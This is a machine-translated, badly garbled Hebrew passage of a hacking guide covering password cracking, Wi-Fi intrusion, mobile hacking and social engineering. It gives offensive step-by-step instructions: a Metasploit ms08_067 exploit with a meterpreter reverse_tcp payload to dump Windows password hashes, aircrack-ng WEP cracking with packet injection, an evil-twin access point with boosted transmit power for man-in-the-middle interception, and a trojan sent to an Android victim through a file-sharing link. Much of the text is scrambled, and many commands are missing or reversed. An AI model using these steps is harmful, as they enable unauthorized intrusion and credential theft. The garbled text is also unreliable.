1. Cain & Abel -מ שמ ש לפיצו ח NTו-Windows RDP. ML-ו -Cisco IOS Hash, Radius Hashו (NTLM) LanManager Hash, Pic
– 2. Elmcomsoft Distributed Password Recoveryפיצו ח סי סמאות -PGP.ו PKCS, Microsoft Officeזהי כו ל ל שמ ש גם בפיצו ח
סי סמאות מ בוזרות ו ל ש חזר 10,000מ ח ש בים בר שת .הוא גם עו שה שימו ש במאיץ GPUשי כו ל להג ביר את מהירות הפיצו ח ש לו עד פי 50.
6. Pandora -פיצו ח סי סמאות מ שתמ ש לא מ קוונות או מ קוונות ע בור ח ש בונות Novell Netware
7.ש חזור סי סמא מער כת פרוא ק טי בית -מ ש חזר כ ל סי סמה המאו ח סנת באופן מ קומי במער כת הפע לה Windows.זה כו ל ל סי סמאות
ל כני סות VPN, RAS, SYSKEY ,ואפי לו חי בורי WEPאו WPA.
שים ל ב ש ח ל ק מה כ לים ה ל לו ע שויים לדרו ש גי שה פיזית למער כת ש ברצונך לפרוץ .באותה צורה ,ז כור ש ברגע ש להא קר תהיה גי שה פיזית למער כת שאתה
מת כוון להגן ,הואיו כ ל ל חפור ב כ ל ה ק בצים המוגנים ב סי סמה או מוצפנים שי ש לך ,כ ל עודי ש לו את ה כ לים הנ כונים .
כא שר בוד קים ט ק טי קות לפיצו ח סי סמאות ,א חד הד ברים ה ח שו בים ביותר שאתה צריך לז כור הוא שה ט כני קה שאתה צריך ל בדו ק תהיה מ בו ס סת ע ל סוג
ההצפנה ש ל ה סי סמה שאתה צריך לפצ ח .כמו כן ,אם אתם בוד קים פריצות לפיצו ח סי סמאות,יית כן שתצ טר כו גם לז כור שמער כות מ סוימותי כו לות לנעו ל
מ שתמ שים מ שוי כים ,מה שע לו ל לגרום למניעת שירות למ שתמ שים שמ שתמ שים בר שת.
Machine Translated by Google
הערות ע ל הצפנת סי סמה
סי סמאות ,לא חריצירתן ,מוצפנות באמצעות א לגוריתם גי בו ב חד כיווני .סי סמאות הגי בו ב ה ל לו נתפ סות אז כמ חרוזות מוצפנות .מה סי בות ה ברורות,
הגי בו בים שנוצרו אינם הפי כים ,מה שהופך סי סמאות ב לתי אפ שריות לפענו ח .אם אתה מנ סה לפצ ח סי סמאות במער כת הפע לה לינו ק ס,י ש דרגת
קו שי נו ספת לע שות זאת בג ל ל מידת הא קראיות הנו ספת ב סי סמאות מ כיוון שמער כת הפע לה זו מו סיפה "מ ל ח" ,או ערך א קראי כדי להפוך סי סמאות
ליי חודיותיותר .ו למנוע מ שני מ שתמ שים לה שיג את אותו ערך hash.
עם זאת ,אםי ש לך את ה כ לים הנ כונים ,אתהי כו ל להפעי ל סוגים שונים ש ל הת קפות כדי לנ סות ל ש חזר או לפצ ח סי סמה .הנה כמה מהם:
כפי שה שם מרמז ,הת קפות א לו עו שות שימו ש במי לים הזמינות במי לון כנגד מאגר ה סי סמאות ש ל המער כת .סוג זה ש ל הת קפה מ ק ל
ע ליך לג לות סי סמאות ח ל שות ,או סי סמאות שעו שות שימו ש באיות ח לופי ,כגון pa$$wordלה ח ליף " סי סמה" .כו חו ש ל כ לי הת קפה ש ל
מי לון מ בו ס ס ע ל כמות מי לות אוצר המי לים שהוא מ כי ל.
2.הת קפות ב כו ח ג ס
הת קפות א לו מ סוג לות לפצ ח כ ל סוג ש ל סי סמה ש כן היא עו שה שימו ש ב כ ל שי לו בי האותיות ,התווים המיו חדים והמ ספרים עד לפיצו ח
ה סי סמה ש ל מ כ שיר.
עם זאת ,ק ל לנ ח ש את הפגם ב ט כני קה זו -זהי כו ל ל ק חת הר בה זמן כדי ל ח שוף סי סמה ,במיו חד חז קה.
הת קפות ק שת מעו לות לפיצו ח סי סמאות גי בו ב ,ו סוגי הת קפות א להי כו לים לגרום לא חוזי הצ ל חה ג בוהיםיותר .כ לים שעו שים שימו ש
בהת קפות ק שת בענןי כו לים גם לפצ ח סי סמאות מהריותר ,בה שוואה ל כ לי ת קיפה במי לונים ו כ לי כו ח ג ס .הפגם הי חיד ש ל סוג זה ש ל
הת קפה הוא שהואי כו ל ל ח שוף ר ק סי סמאות בע לות 14תווים או פ חות.
Machine Translated by Google
דר כים א חרות ל ח שוף סי סמאות
כפי שהוז כר קודם ל כן ,הדרך ה ק לה ביותר לפצ ח סי סמה היא ל ק ב ל גי שה פיזית למער כת שאתה מנ סה לפרוץ .אם אינך
מ סוג ל לע שות שימו ש ב כ לי פיצו ח במער כת ,תו כ ל לה שתמ ש ב ט כני קות ה באות במ קום זאת:
זוהי ב ק לות א חת ה ט כני קות היעי לות ביותר בפיצו ח סי סמאות ,מ כיוון שהיא עו שה שימו ש במ כ שיר ה ק ל טה ש לו כד
ה ק שות תוך כדי ה ק לדתן במ ק לדת .אתהי כו ל לה שתמ ש בתו כנת רי שום מ ק לדת ,כגון -Spector Pro,ו Stealth
KeyLoggerאו חומרת רי שום מ ק לדת כגון KeyGhost.
י שיותר מדייי שומים ברו ב המ ח ש בים המא ח סנים סי סמאות באופן מ קומי ,מה שהופך אותם לפגיעים מאוד לפריצה.
ברגע שי ש לך גי שה פיזית למ ח ש ב ,תו כ ל לג לות ב ק לות סי סמאות פ שו ט ע לידי חיפו ש א חר פרצות א ח סון או שימו ש
ב חיפו שי ט ק ס ט .אםיתמז ל מז ל כם ,תו כ לו אפי לו למצוא סי סמאות מאו ח סנות באפ לי קציה עצמה.
מ ח ש בים ר בים מאפ שרים למ שתמ שים לע שות שימו ש ב סי סמאות הפע לה ע ל מנת להגן ע ל הגדרות ה חומרה
הממו קמות ב ש ב בי -CMOSה ש להם .עם זאת ,אתהי כו ל ב ק לות לאפ ס את ה סי סמאות ה ל לו ע לידי ה ח לפת מג שר
בודד ב לו ח האם או ניתו ק סו ל לת CMOSמה לו ח .אתהי כו ל גם לנ סות את מז לך ו ל חפ ש באינ טרנ ט אי שורי כני סה
למ שתמ ש ברירת מ חד ל ע בור סוגים שונים ש ל לו חות אם באינ טרנ ט.
4.תפו ס סי סמאות מר חו ק
אם גי שה פיזית למער כת או למי קומה ב לתי אפ שרית ,אתה עדייןי כו ל לתפו ס סי סמאות המאו ח סנות מ קומית
במער כת הפוע לת ע ל מער כת הפע לה Windowsממי קום מרו ח ק ואפי לו לתפו ס את האי שורים ש ל ח ש בון מנה ל
המער כת .אתהי כו ל לע שות זאת ע לידי ביצוע הת קפת זיוף ת חי לה ,ו לא חר מ כן ניצו ל קו בץ -SAMה ב קו בץ הרי שום
ש ל המ ח ש ב הממו קד ע לידי ביצוע ה ש ל בים ה באים:
2.לא חר מ כן ,הזן את הפ קודה ה באהmsf (ms08_067_netapi) > set payload :
/windows/meterpreter/reverse_tcp
מ כיוון שרו ב מער כות ההפע לה והיי שומים נו טים לא ח סן סי סמאות -hashב למ טרות הצפנה,יית כן ש לא
תו כ ל לראות את אי שורי המ שתמ ש שאתה מ חפ ש מיד .עם זאת ,אתהי כו ל ל ק ב ל את הגי בו בים הא לה
ו לפר ש אותם מאו חריותר .כדי לתפו ס את -hash,הה שתמ ש בפ קודה הזו:
לא חר שתזין את זה ,תראה את כ ל המ שתמ שים במער כת שאתה פורץ ,ואת ה סי סמאות הגו ב בות .לא חר
מ כן תו כ ל לנ סות לפענ ח את הגי בו בים ה ל לו באמצעות כ לים כגון קין וה ב ל.
Machine Translated by Google
Machine Translated by Google
Machine Translated by Google
פר ק 8:פריצת חי בורי ר שת
אמנות הפריצה ל חי בורי ר שת היא ב ק לות א חד מהמע ל לים האהו בים ע ל הא קר .ע לידי פריצת חי בורי אינ טרנ ט ,הא קרי כו ל
ב ק לות לה סתיר את זהותו ,ליהנות מרו ח ב פ ס חינם להורדות מא סי ביות ו לע שות שימו ש ב חי בור א חר לפעי לויות לא חו קיות.
זה גם מאפ שר להא קר לפענ ח את התע בורה ש ל המ שתמ ש ו לתפו ס אותם .אתהי כו ל ר ק לדמיין מה מ סוג ל לע שות הא קר
פ לי לי ברגע שהוא מ שיג את חי בור -Wi-Fiה ש לך ואת הצרות שאתה ע לו ל להיות בהן כ שזהי קרה.
לפני שתנ סה ל בדו ק פריצות ל חי בורי אינ טרנ ט ,ח שו ב שת בין ת חי לה את רמות הפר טיות ב כ ל הנוגע להגנה ע ל ה חי בור
הא ל חו טי ש לך .רמת ההת קפה שאתה צריך ל בדו ק תהיה ת לויה מאוד ברמת הא ב ט חה ש ל חי בור אינ טרנ ט ממו קד .לה לן
כמה מפרו טו קו לי הא ב ט חה ה ב סי סיים ביותר ב חי בורים א ל חו טיים:
כפי שה שם מרמז ,רמת הצפנה זו נועדה ל ספ ק למ שתמ שים פר טיות ע בור חי בור קווי .עם זאת ,זה ק ל להפ ליא
לפיצו ח בג ל ל ו ק טור האת חו ל ה ק טן ש לו שניתן ל ל כוד ב ק לות בזרם הנתונים .סוג זה ש ל הצפנה זמין בדרך כ ל ל
ב חי בורים א ל חו טייםי שנים ו במ כ שירים שעדיין לא שודרגו כדי להתאים לפרו טו קו לי א ב ט חת אינ טרנ ט טו ביםיותר.
פרו טו קו ל א ב ט חה זה נוצר כדי ל טפ ל ב חו ל שות ה קיימות בהצפנת WEPועו שה שימו ש בפרו טו קו ל )(TKIP
Temporal Key Integrityכדי ל בצע שיפורים בא ב ט חת WEPמ ב לי לדרו ש מהמ שתמ שים להת קין חומרה חד שה.
המ שמעות היא ש ט כנו לוגיה זו עדיין עו שה שימו ש בא ב ט חת -WEP,האך לת קוף אותה ק שהיותר.
3. WPA2-PSK
זה מ שמ ש בדרך כ ל ל ע ס קים ק טנים ומ שתמ שים ביתיים ועו שה שימו ש במפת ח מ שותף מרא ש או PSK.אמנם
פרו טו קו ל זה מאו ב ט ח הר בהיותר מ שני ה קודמים ,אך הוא עדיין ח שוף ל כמה ט ק טי קות פריצה.
4. WPA2-AES
זוהי הגר סה הארגונית ש ל פרו טו קו ל WPA,העו שה שימו ש ) -Advanced Encryption Standard (AESב להצפנת
נתונים .כא שר אתה רואה שארגון מ שתמ ש ב סוג זה ש ל א ב ט חה ,אתהי כו ל גם לצפות שהוא מגיע עם שרת
RADIUSלאימות נו סף .פרו טו קו ל זהי כו ל להיות ק שה מאוד לע קוף ,אך עדיין ניתן לפצ ח אותו.
Machine Translated by Google
פריצת חי בור WEP
כאן תג לו כיצד ניתן לפרוץ ב ק לות חי בור עם רמת א ב ט חה נמו כה .כדי לנ סות את הפריצה הזו ,תזד ק ק למתאם א ל חו טי,
-BackTrack.ו aircrack-ngברגע שי ש לך את ה כ לים הא לה ,בצע את ה ש ל בים ה באים:
לא חר שתפעי ל את Backtrack,ח בר את המתאם הא ל חו טי ש לך ו בדו ק אם הוא פוע ל .כדי לע שות זאת ,הזן את
הפ קודה:
Iwconfig
לא חר שתע שה זאת ,תו כ ל לראות אם המתאם ש לך מזוהה .אתה ע שוי לראות את זה בתור wlan0, wlan1ו כן
ה לאה.
כעת ,חפ ש את ה חי בורים הזמינים ב קר בת מ קום ע לידי הצ בת המתאם הא ל חו טי ש לך למצ ב צג או למצ ב מופ קר.
כדי לע שות זאת ,הזן את הפ קודה ה באה:
airmon-ngהת ח ל את wlan0
לא חר שתע שה זאתairmon-ng ,י שנה את שם הממ ש ק ש לך ל .0nom-ברגע שתצ לי ח להצי ב את המתאם
הא ל חו טי ש לך למצ ב צג ,תו כ ל ל ל כוד את התע בורה הזמינה ע לידי הזנת הפ קודה ה באה:
airodump-ng mon0
כעת ,תו כ ל לראות את כ ל נ קודות הגי שה וה ל קו חות התואמים ש להן שנמצאים כו לם בפנים
ה טוו ח ש לך.
אם אתה רואה BSSIDאו ESSIDשי ש להם הצפנת WEP,אתה כ בר מ ק ב ל את הרעיון שזהיהיה ה חי בור שה כי ק ל
לפצ ח בר שימת ה sPA-שהצ ל חת ל ל כוד .כעת ,העת ק את -BSSIDה ש ל -APה שנ ב חר והת ח ל ל ל כוד באמצעות
הפ קודה הזו:
airodump-ng --bssid [BSSIDש ליעד[ ]-cמ ספר ערוץ[ -w WEPcrack mon0
לא חר הזנת הפ קודהBacktrack ,ית חי ל ל ל כוד מנות מנ קודת הגי שה הממו קדת בערוץ המ סוים ש לה ו לא חר מ כן
ל כתו ב את -WEPcrackה בפורמ ט ש ל pcap.זהיאפ שר לך ל ק ב ל את כ ל ה ח בי לות שאתה צריך כדי לפענ ח את
מפת ח ה סי סמה המ שמ ש ב חי בור שא ליו אתה רוצה להת ח בר .עם זאת ,ק ב לת מ ספי ק מנות לפענו ח ע שויה להימ שך
זמן ר ב .אם אתה לאי כו ל ל ח כות
Machine Translated by Google
ל ק ב ל מ ספי ק מנות ,אתהי כו ל להזרים תע בורת ARPבמ קום זאת.
אם אין לך ס ב לנות לה שיג מ ספי ק מנות ע בור ל כידת WEPkey,אתהי כו ל ל ל כוד ח בי לת ARPו לא חר מ כן להפעי ל
אותה מ ספר פעמים כדי ל ק ב ל את כ ל -IVsה שאתה צריך ל ק ב ל כדי לפצ ח את WEPkey.מ כיוון ש כ ברי ש לך את
-BSSIDה ואת כתו בת ה CAM-ש ל היעד )ניתן לא סוף את שניהם ב ש ל ב 3),הזן את הפ קודה ה באה:
כעת ,אתהי כו ל להזרי ק את ה sPRA-שנ ל כדוי שירות לנ קודת הגי שה ש ל היעד .כ ל מה שאתה צריך לע שות ע כ שיו
הוא ל ל כוד את -IVsה שייווצרוי שירות לתוך האיירו.pmud
ברגע שתצ לי חו לה חזי ק מ ספי ק IVsב קו בץ WEPcrack,תו כ לו להריץ את ה קו בץ -aircrack-ngב ע לידי הזנת הפ קודה
ה באה:
-aircrack-ngה בדרך כ ל ליזין את המפת ח במ סך ש לך בפורמ ט ה ק סדצימ לי .כ ל מה שאתה צריך לע שות הוא לה חי ל
את המפת ח הזה בנ קודת הגי שה המרו ח קת כדי ליהנות מהאינ טרנ ט ה חינמי ש לך.
Machine Translated by Google
The Evil Twin Hack
בעוד שהא קרים מת חי לים ר בים מת לה בים לפרוץ סי סמאות Wi-Fiכדי ליהנות מרו ח ב פ ס חופ שי,י שנן פריצות ל חי בורי ר שת
שהן חז קותיותר ומ ספ קות גי שה טו בהיותר מ חי בור לאינ טרנ ט ב חינם .בין הפריצות ה ל לו ניתן למצוא את פריצת נ קודת הגי שה
התאומה המרו שעת.
הEvil Twin AP -הוא נ קודת גי שה מניפו ל טי בית המופיעה ומתנהגת כמו נ קודת גי שה רגי לה שמ שתמ ש מת ח בר א ליה כדי
להת ח בר לאינ טרנ ט .עם זאת ,הוא מ שמ ש בדרך כ ל ל ע לידי הא קרים כדי להפוך קור בנות ממו קדים לנ קודת הגי שה ש להם .זה
מאפ שר להא קר לראות את כ ל התע בורה שמגיעה מה ל קו ח ,מה שמפנה את מ קומו למת קפה מ סו כנת מאוד ש ל אי ש -באמצע.
ברגע שאתה רואה שה כר טי ס הא ל חו טי מזוהה ע לידי Backtrack,הצ ב אותו במצ ב צג או מופ קר ע לידי הזנת
הפ קודה:
3.
הפע ל אוויר dump-ng
הת ח ל ל ל כוד את כ ל התע בורה הא ל חו טית שה כר טי ס הא ל חו טיי כו ל לזהות ע לידי הזנת הפ קודה:
לא חר שתע שה זאת ,תו כ ל לראות את כ ל נ קודות הגי שה ב טוו ח .אתר את נ קודת הגי שה ש ל היעד ש לך
לא חר שהיעד מת ח בר לנ קודת הגי שה ,העת ק את -BSSIDה ואת כתו בת ה CAM-ש ל המער כת ש ברצונך לפרוץ.
bt > airbase-ng -a [BSSID] --essid ["SSIDש ל היעד"[ ]-cמ ספר ערוץ[ mon0
זהיצור את נ קודת הגי שה ,או התאום המרו שע ,שא ליה תרצה שהיעד ש לךית ח בר.
ע כ שיו ,הנה ה ח ל ק המ כריע -ע ליך לוודא שהאות ש ל נ קודת הגי שה המזויף שיצרת זה עתה חז ק או חז קיותר
מנ קודת הגי שה המ קורית .מ כיוון שאתה תו קף מר חו ק ,אתה כמע טי כו ל לה סי ק ש ל חי בור -WiFiה ש לוי ש אות הר בה
יותר חז ק מ ש לך .עם זאת ,אתהי כו ל לה שתמ ש בפ קודה ה באה כדי להג ביר את האות:
הזנת פ קודה זו תג ביר את הה ספ ק ש ל נ קודת הגי שה ש לך ב 005-מי ליווא ט ,או 27 dBm.
עם זאת ,שימו ל ב כי בהתאם למר ח ק ש ל כם מהמ טרה,יית כן ש 005-מי ליווא ט לאי ספי קו לו כדי להי שאר מ חו בר
לתאום המרו שע .עם זאת ,אםי ש לך כר טי ס א ל חו טי חד שיותר ,תו כ ל להג ביר את האות ש ל נ קודת הגי שה עד
ל 0002-מי ליווא ט ,או פי אר בעה ממה שמ קו ב ל בארה" ב.
ש ל ב זה מגיע עם אזהרה :זה לא חו קי לה ח ליף ערוצים בארה" ב ,ו לפני שתמ שיך ,וודאו שי ש ל כם אי שור מיו חד בתור
הא קר אתי.
י שנן מדינות מ סוימות המאפ שרות כו ח Wi-Fiטו ביותר ,מה שי כו ל ל סייע לך ב שמירה ע ל עוצמת האות ש ל נ קודת
הגי שה התאומה המרו שעת ש לך .לדוגמה ,בו לי ביה מאפ שרת למ שתמ שי האינ טרנ ט ש לה לג שת לערוץ -Wi-Fi 12,ה
שמגיע עם ה ספ ק מ לא ש ל 1000מי ליווא ט .כדי ל שנות את ערוץ האות ש ל ה כר טי ס הא ל חו טי ש לך כך שיתאים לא לו
ש ל בו לי ביה ,הזן את הפ קודה ה באה:
מ כיוון שהערוץ ש לךיאפ שר לך כעת להג ביר את העוצמה ש ל נ קודת הגי שה ש לך ,אתהי כו ל להג ביר עודיותר את
האות ש ל התאום המרו שע ש לך ע לידי הזנת הפ קודה:
כעת ,לא חר שה קמתם במ לואו את APהתאום הר שע וה ב ט חתם שהמ טרה ש ל כם מ חו ברת א ליו ,תו כ לו לנ קו ט
בצעדים ה באים כדי לזהות פעי לויות במער כת ש לו.
אםי ש לך את ה כ לי Ettercap,אתהי כו ל ב ק לות ל בצע מת קפת אי ש -באמצע כדי לנת ח נתונים שהוא שו ל ח או
מ ק ב ל ,לייר ט את כ ל התע בורה ,או אפי לו להזרים את התע בורה שאתה רוצה שהואי ק ב ל .אתהי כו ל גם ליצור
מאזיןי שירות לתוך המער כת ש לו כדי לה שיג ש לי טה מו ח ל טת.
Machine Translated by Google
Machine Translated by Google
פר ק 9:מ בוא לפריצה לנייד
פריצה לנייד הגיונית ל ח לו טין בג ל ל ע לייתם ש ל סמאר טפונים ומ כ שירים ניידים א חרים לע ס קאות מ קוונות ו ל חי בור עם א חרים.
מ כיוון שמ כ שירים ניידים הם מו קדים ש ל מידע אי שי ש ק ליותר לג שת א ליהם בה שוואה למ ח ש בים אי שיים ,הם מהמ כ שירים
הפגיעים ביותר ע בור הא קרים.
למה כדאי לפרוץ למ כ שירים ניידים? סוגים שונים ש ל פריצות למ כ שירים ניידים מאפ שרים לך ל בצע את הפעו לות ה באות:
אם אתה חו ש ב כמו הא קר ,ת בין שא חת הדר כים ה ק לות ביותר להי כנ ס למ ספר מ כ שירים ניידים ו להת קין שם חנות היא ליצור
אפ לי קציה לנייד.
פריצת אפ לי קציות לנייד היא בין הדר כים המהירות ביותר ל חדור למער כת מ כ שירים ניידים ש כן ק ל להע לות אפ לי קציה זדונית
באינ טרנ ט ו לאפ שר לאנ שים להוריד את הפריצה ,אפי לו ב לי ל ח שו ב אם ע ליהם ל ב חון את ההורדה ש להם או לא .אפ לי קציות לנייד
נ ח ש בות גם כ"פרי ת לוי נמוך" .לרו ב האפ לי קציות הניידות ניתן לג שתי שירות דרך ה קודים ה בינאריים ש להן ,או ה קוד שמ כ שירים
ניידים צרי כים כדי להפעי ל את האפ לי קציה .זה אומר ש כ ל מי שי ש לויד ע ל כ לי פריצה מ שוו קים מ סוג ל לנצ ל אפ לי קציות ניידות
זמינות ו להפוך אותן ל כ לי פריצה .ברגע שהא קריםיצ לי חו להתפ שר ע ל אפ לי קציה לנייד ,הםיו כ לו ל בצע את הפ שרה הרא שונית
תוך ד קות.
הנה כמה דר כים כיצד הא קרים מנצ לים קודים בינאריים באפ לי קציות לנייד:
כא שר הא קרים מ שנים את ה קוד ה בינארי ,הם עו שים זאת כדי לה ש בית את ב קרות הא ב ט חה ש ל האפ לי קציה ,דרי שות
ר כי שה או הנ חיות להצגת מודעות .כא שר הם מ סוג לים לע שות זאת ,הםי כו לים להפיץ את האפ לי קציה ש שונתה בתור
קרא ק ,אפ לי קציה חד שה או תי קון
כא שר הא קרים מצ לי חים ל שים אתידם ע ל קוד בינארי ,הםי כו לים לה חדיר בו קוד זדוני ואז להפיץ אותו כעד כון אפ לי קציה
או כתי קון .פעו לה זו ע לו לה ל ב ל ב ל מ שתמ ש ל ח שו ב שהוא ר ק מעד כן את האפ לי קציה במ כ שיר הנייד ש לו ,א ב ל למע שה,
ההא קר הנד ס את המ שתמ ש להת קין אפ לי קציה א חרת לגמרי.
הא קריםי כו לים ל בצע מת קפת Drive-by,מה שמתאפ שר ע לידי ביצוע ה/IPA-פונ קציה hookingאו swizzling.כא שר
זה נע שה ,ההא קריו כ ל ל ס כן בהצ ל חה את האפ לי קציה הממו קדת ו לאפ שר הפניית התנועה או גני בת אי שורי מ שתמ ש.
הא קר שי ש לו גי שה ל קוד בינאריי כו ל ב ק לות ל בצע פריצה ש ל הנד סה לא חור כדי ל ח שוף נ קודות תורפה נו ספות ,ל בצע
אפ לי קציות זיוף דומות ,או אפי לו ל ש לו ח אותו מ חד ש ת חת מיתוג חד ש.
Machine Translated by Google
ניצו ל מ כ שיר נייד מר חו ק
Kali Linux,ער כת כ ליםידועה לניצו ל מ ח ש בים ,היא גם א חד ה כ לים היעי לים ביותר ל ביצוע פריצה במ כ שיר נייד .בצע את
ה ש ל בים ה באים כדי ל בצע פריצה מר חו ק במ כ שיר נייד ו להת קין קו בץ זדוני במ כ שיר ממו קד.
ה ק לד את הפ קודה ה באה:
בזמן ש קא לייוצר את ה קו בץ ש לך ,טען מ סוף א חר ו טען את קונ סו לת metasploit.כדי לע שות זאת ,הזן את הפ קודה:
Msfconsole
3.הגדר את המאזין
לא חר שה tiolpsatem-נגמר ,טען את הניצו ל ש ל רי בוי מ טפ לים ע לידי הזנת הפ קודה:
ה שתמ ש -exploit/multi/handlerב
לא חר מ כן ,תצ טרך להגדיר את סוג המאר ח Lכדי שתו כ ל להת חי ל ל ק ב ל תע בורה .כדי לע שות זאת ,ה ק לד את הפ קודה
ה באה:
כעת ,לא חר שהמאזין ש לך מו כן ,כעת תו כ ל להת חי ל את הניצו ל ש לך ע לידי הפע לת המאזין ש לך.
כדי לע שות זאת ,ה ק לד את הפ קודה:
לְנַצֵ ל
אם ה קו בץ הזדוני או ה טרויאני שיצרת לפני זמן מה מו כן ,העת ק אותו מתי קיית ה שור ש למ כ שיר הנייד ש לך ,רצוי ל ט לפון
אנדרואיד .לא חר מ כן ,הפוך את ה קו בץ לזמין ע לידי הע לאתו ל כ ל אתר שיתוף ק בצים כגון speedyshareאו Dropbox.
ש ל ח את ה קי שור ליעד ש לך ,ו ב ק ש ממנו להת קין את האפ לי קציה.
Machine Translated by Google
לא חר שמ שתמ ש היעד ש לך הת קין את ה קו בץ ,כעת תו כ ל ל ק ב ל את התע בורה שהוא מ ק ב ל דרך המ כ שיר הנייד
ש לו!
Machine Translated by Google
Machine Translated by Google
Machine Translated by Google
פר ק 10:הנד סה ח ברתית
הנד סה ח ברתית היא א חת הפריצות ה ח שו בות ביותר שניתן ל בצע ע ל מנת לפרוץ באמצעות פרו טו קו לי א ב ט חה .עם זאת,
לא מדו בר בפריצה שמת בצעת כנגד מער כת מ ח ש ב עצמה; במ קום זאת ,מדו בר בפריצה שמת בצעת נגד אנ שים ,שי כו לה
להיות ה חו ליה ה ח ל שה ביותר ב שר שרת ש ל אמצעי א ב ט חה.
הנד סה ח ברתית ,הידועה גם ב שם "פריצות לאנ שים" ,היא א חת הפריצות ה ק שות ביותר ל ביצוע מ כיוון ש לא נפוץ שאנ שים
נותנים מידע מ סווג לאדם זר מו ח ל ט .עם זאת ,זה אפ שרי ע בור כ ל הא קר מנו סה להעמיד פנים שהוא מי שהו שאתהי כו ל
ל סמוך ע ליו כדי ל ק ב ל גי שה למ סמ כים ו סי סמאות ח שו בות .כ ל מה שנדר ש להא קר פ לי לי מנו סה ל בצע ט ק טי קה ש ל הנד סה
ח ברתית הוא ל ק ב ל את המידע הנ כון ע ליך.
Machine Translated by Google
הנד סה ח ברתית כאמנות ומדע
ההיגיון מא חורי ההנד סה ה ח ברתית הוא פ שו ט -זהי כו ל להיות ק ל ל ק ב ל את כ ל המידע והגי שה שאדם צריך מ כ ל אדם כ ל עוד אתהיודע איך
להערים ע ל אדם לתת לך את הנתונים שאתה צריך במינימום התנגדות .ע לידיי כו לת להוציא טרי ק ש ל הנד סה ח ברתית ,תו כ ל ל שיםיד ע ל מ כ שיר,
ח ש בון או אפ לי קציה שאתה צריך לג שת א ליהם כדי ל בצע פריצות גדו לותיותר או ל ח טוף זהות ל ח לו טין .זה אומר שאם אתה מ סוג ל לממ ש ט ק טי קה
ש ל הנד סה ח ברתית לפני שאתה מנ סה לע בור את כ ל ט ק טי קות ה ח טיפה הא חרות ב שרוו ל ש לך ,אתה לא צריך לע שות מאמץ נו סף כדי ל חדור
למער כת .אם לנ ס ח את כ ל התפי סה הזו במונ חים פ שו טיםיותר ,הנד סה ח ברתית היא סוג ש ל פריצה העו ס קת במניפו לציה ש ל קור בנות באמצעות
אינ טרא קציה ח ברתית ,במ קום צורך לפרוץ מיד למער כת מ ח ש בים.
מה שמ ק שה ע ל הנד סה ח ברתית הוא שהיא מ בו ס סת במידה ר בה ע ל הי כו לת לה ב טי ח אמון ,מה שמתאפ שר ר ק ע לידי ק ב לת אמון ש ל מי שהו.
מ סי בה זו ,ההא קרים המצ לי חים ביותר מ סוג לים ל קרוא תגו בות אפ שריות מאדם ב כ ל פעם שהם מופע לים ל בצע פעו לה כ ל שהי בי ח ס למער כת
הא ב ט חה ש להם .ברגע שתצ לי ח ל בצע את הת חזיות הנ כונות ,תו כ ל ל ק ב ל סי סמאות ונ כ סי מ ח ש בי קרי ערך א חרים מ ב לי שתצ טרך לה שתמ ש ביותר
מדי כ לים.
מ כיוון שהנד סה ח ברתית עו ס קת בעי קר בפ סי כו לוגיה ,אתהי כו ל ל ש קו ל את ה ט ק טי קה הזו כאומנות וגם כמדע .ט ק טי קה זו כו ל לת מידה ר בה ש ל
יצירתיות וי כו לת לפענ ח שפה לא מי לו לית ש ל בע ל מ כ שיר או ח ש בון .מומ חי הנד סה ח ברתית מ סוג לים להר כי ב ט ק טי קות שנראות כמו עו בדות נגד
מ שתמ שי מ ח ש ב כ ל הזמן.
י חד עם סוגים א חרים ש ל פריצות זמינות ,ת בינו שהנד סה ח ברתית היא ח ל ק מההת קפות המוצ ל חות ביותר ,ו שהת קפות עו בדות בעי קר בג ל ל צורה
כ ל שהי ש ל ת ח בו לה נפ שית שמ בצע הא קר .הנד סה ח ברתית מאפ שרת לאדם פ שו ט להי כנ ס למידע אי שי ב כ ל צורה שהוא רואה ,או לפתו ח
ב חופ שיות קו בץ מצורף שה טמיע תו כנה זדונית.
מ כיוון שהמ טרה ש ל ההנד סה ה ח ברתית היא לרמות מי שהו ל ספ ק מידע שיאפ שר גי שה לנתונים בע לי ערך ר ביותר ,ט ק טי קת הפריצה הזו תאפ שר
לך ל ק ב ל בעי קר כ ל ד בר ממער כת ממו קדת .מה שהופך את זה ל ט ק טי קה טו בה הוא שאתהי כו ל לדוג א חר שער למידע שאתה רוצה לפרוץ מ כ ל
מי שי ש לו גי שה למער כת שא ליה אתה מ כוון ,מפ קידי ק ב לה ועד לאנ שי IT,עם ה ש ל בים ה באים:
1.מ ח קר
2.יצירת אמון
האמנות והמדע שמא חורי ההנד סה ה ח ברתית נוצרים בג ל ל אמת א חת ע ל א ב ט חת מידע -א ב ט חה מ סתיימת ומת חי לה בידע ש ל המ שתמ ש כיצד
י ש להגן ע ל מער כת .לא מ שנה עד כמה מער כת הא ב ט חה ש לך מעוד כנת ,לעו לם לא תו כ ל להגן ע ל הר שת ש לך ו ש לך
Machine Translated by Google
מ כ שירים אםי ש מ שתמ ש בצד ש לך שאינו מ סוג ל ל שמור מידע חיוני מתו קפים פו טנציא ליים .עם המ ח ש בה הזו עו לה הרעיון
ש ברגע שמהנד ס ח ברתי נע שה מודעיותר למי צריך למ קד בתוך הארגון מידע קרי טי הדרו ש כדי ל חדור למער כת ,כך
המידע בע ל הערך ש ל הארגון פגיעיותר.
Machine Translated by Google
איך הנד סה ח ברתית מתר ח שת
אם אתה הו לך ל ח שו ב כמו מהנד ס ח ברתי ,ת ק ב ל את הרעיון שהאנ שים הפגיעים ביותר בתוך כ ל ארגון הם א לה ש ס ביר
מאוד שימ סרו מידע עם ה כי פ חות התנגדות אפ שרית.
עם המ ח ש בה הזו ,אתהי כו ל ב ק לות לאפ ס את פ קידי ה ק ב לה ,סו כני המו קד ה ט לפוני וא חרים שהו כ שרו למ סור מידע ל כ ל
מי שמ ב ק ש אותם .אפ שר להני ח שה באים בתור הם מ שתמ שי קצה שהם תמימים מ ספי ק ל ח שו ב שהםי כו לים ל ספ ק מידע
אי שי לא לה שמתיימרים להיות אנ שי תמי כה ט כנית ,מפ ק חים או אנ שים שי כו לים ל ספ ק להם פר ס ר ק ע ל ת שו בה ל שא לה
שע לו לה להד ליף את הת שו בה ל שא לת פר טיות.
מ כיוון שהנד סה ח ברתית נ שענת מאוד ע ל התנהגות המ שתמ שים כ לפי א ב ט חת מידע ,האנ שים הרגי שים ביותר להת קפות
הם ה באים:
2.אנ שים שיוצרים סי סמאות באמצעות שמות,ימי הו לדת או שם חיית המ חמד ש להם
5.אנ שים שאינם מא ב ט חים פיזית את המ כ שירים ש להם ,או כ ל מ סמך שע לו ל להצ ביע ע ל פר טים ע ל פרו טו קו לי
